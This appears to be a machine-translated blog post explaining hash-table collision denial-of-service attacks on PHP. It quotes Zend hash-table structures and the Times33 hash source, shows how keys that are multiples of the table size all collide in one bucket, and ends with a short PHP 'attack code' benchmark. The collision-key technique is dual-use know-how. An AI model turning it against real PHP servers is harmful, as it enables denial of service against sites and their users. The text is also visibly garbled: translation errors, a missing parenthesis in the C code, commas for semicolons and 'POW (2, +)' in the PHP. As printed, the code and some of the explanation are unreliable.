Hash table is a very efficient data structure, the hash table in PHP is a very important data structure, not only for representing arrays, associative arrays, object properties, function tables, symbol tables, It is also used inside the Zend virtual machine to store contextual information (variables and functions that execute context are stored using the hash table structure).
PHP uses a single-linked list to store collisions, so the average lookup complexity of the PHP hash table is O (l), where L is the average length of the bucket list, and the worst-case complexity is O (N), when all the data collide and the hash table degrades into a single-linked list
Hash table collision Attack is through the careful construction of data, so that all the data collision, artificial hash table into a degenerate single-linked list, this time the hash table various operations increased by an order of magnitude, and therefore consume a lot of CPU resources, resulting in the system can not quickly respond to requests, To achieve the purpose of a denial of service attack (DoS)
Here is the structure of the hash table
typedef struct BUCKET { ulong H; /* Used for numeric indexing */ uint Nkeylength; void *pdata; void *pdataptr; struct bucket *plistnext; struct bucket *plistlast; struct bucket *pnext; struct bucket *plast; const char *arkey;} bucket;typedef struct _hashtable { uint ntablesize; UINT Ntablemask; UINT Nnumofelements; ULONG Nnextfreeelement; Bucket *pinternalpointer; /* Used for element traversal */ Bucket *plisthead; Bucket *plisttail; Bucket **arbuckets; dtor_func_t Pdestructor; Zend_bool Persistent; unsigned char napplycount; Zend_bool bapplyprotection; #if zend_debug int inconsistent; #endif} HashTable;
Zend Hashtable's hashing algorithm is exceptionally simple:
Hash (key) =key & Ntablemask
That is, the original key of the data and the ntablemask of Hashtable can be simply bitwise AND.
If the original key is a string, first use the TIMS33 algorithm to convert the string to reshape and then to the Ntablemask bitwise with.
Hash (strkey) =time33 (strkey) & Ntablemask
Here is the Times 33 algorithm in/zend/zend_hash.h this file
/* * DJBX33A (Daniel J. Bernstein, Times addition) * * This is Daniel J. Bernstein ' s popular ' times ' hash funct Ion as * posted by him years ago on comp.lang.c. It basically uses a function * like ' hash (i) = hash (i-1) * + str[i] '. This was one of the best * known hash functions for strings. Because It is both computed very * fast and distributes very well. * * The magic of number, i.e. why it works better than many other * constants, prime or not, have never been adequately Explained by * anyone. So I try a explanation:if one experimentally tests all * multipliers between 1 and [as RSE did now] one detects that Even * numbers is not useable at all. The remaining odd numbers * (except for the number 1) is more than or less all equally well. They * all distribute in an acceptable the and this is a hash table * with an average percent of approx. 86%. * If One compares the chi^2 values of the variants, the number is not * even have the best value. But the NuMber and a few other equally * good numbers like, 127 and 129 has nevertheless a great * advantage to the R Emaining numbers in the large set of possible* Multipliers:their multiply operation can is replaced by a faster * Operati On based in just one shift plus either a single addition * or subtraction operation. And because a hash function have to both * distribute good _and_ have to is very fast to compute, those few * numbers should Being preferred and seems to being the reason why Daniel J. * Bernstein also preferred it. * * *--Ralf S. Engelschall <[email protected]> */static inline ulong Zend_inline_hash_func (c Onst Char *arkey, uint nkeylength) {Register ULONG hash = 5381; /* Variant with the hash unrolled eight times */for (; nkeylength >= 8; nkeylength-= 8) {Hash = ((hash << 5) + hash) + *arkey++; hash = ((hash << 5) + hash) + *arkey++; hash = ((hash << 5+ hash) + *arkey++; hash = ((hash << 5) + hash) + *arkey++; hash = ((hash << 5) + hash) + *arkey++; hash = ((hash << 5) + hash) + *arkey++; hash = ((hash << 5) + hash) + *arkey++; hash = ((hash << 5) + hash) + *arkey++; } switch (nkeylength) {Case 7:hash = ((hash << 5) + hash) + *arkey++;/* Fallthrough ... */ Case 6:hash = ((hash << 5) + hash) + *arkey++; /* Fallthrough ... */Case 5:hash = ((hash << 5) + hash) + *arkey++; /* Fallthrough ... */Case 4:hash = ((hash << 5) + hash) + *arkey++; /* Fallthrough ... */Case 3:hash = ((hash << 5) + hash) + *arkey++; /* Fallthrough ... */Case 2:hash = ((hash << 5) + hash) + *arkey++; /* Fallthrough ... */Case 1:hash = ((hash << 5) + hash) + *arkey++; Break Case 0:break; Empty_switch_default_case ()} return hash;}
So, how is this key value constructed?
PHP hashtable size is 2 index, for example, if you deposit 10 elements of the array, then the actual size of the array is 16, if the deposit 20, then the actual size is 32, and 63 words, the actual size is 64. When your number of elements is greater than the maximum number of elements currently in the array, PHP expands the array and hashes the new hash.
Now, let's say we're going to deposit 65,536 elements (the middle may be expanding, but we just need to know that the last array size is 65536 and the corresponding Tablemask is 0 1111 1111 1111 1111), so if the first time we deposit the key value of the element is 0, The value after the hash is 0, the second 64, also makes the hash after the data is 0 nth time ... This allows the underlying PHP array to hash all the elements into the No. 0 bucket, making the hash table degenerate into a linked list.
The following specific data
0000 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0001 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0010 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0011 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0100 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
......
In general terms, as long as the 16 bits are guaranteed to be 0, then the hash value after the mask is located is all colliding at position 0.
Here is an attack code written using this principle:
<?php $size = POW (2, 16); $startTime = Microtime (true); $array = Array (), for ($key = 0, $maxKey = ($size-1) * $size, $key <= $maxKey, $key + = $size) { $array [$key] = 0;} $endTime = Microtime (true); Echo $endTime-$startTime, ' seconds ', ' \ n ';/********************************************************************** /$size = POW (2, +), $startTime = Microtime (true), $array = Array (), for ($key = 0, $maxKe y = ($size-1) * $size; $key <= $size; $key + = 1) {$array [$key] = 0;} $endTime = Microtime (true); Echo $endTime-$startTime, ' seconds ', ' \ n ';
The normal seconds are done, and the attack takes dozens of seconds.
For the post mode hash collision attack, you can see http://www.laruence.com/2011/12/30/2440.html.
Reference: http://www.laruence.com/2011/12/30/2435.html
PHP Hash Table Collision Attack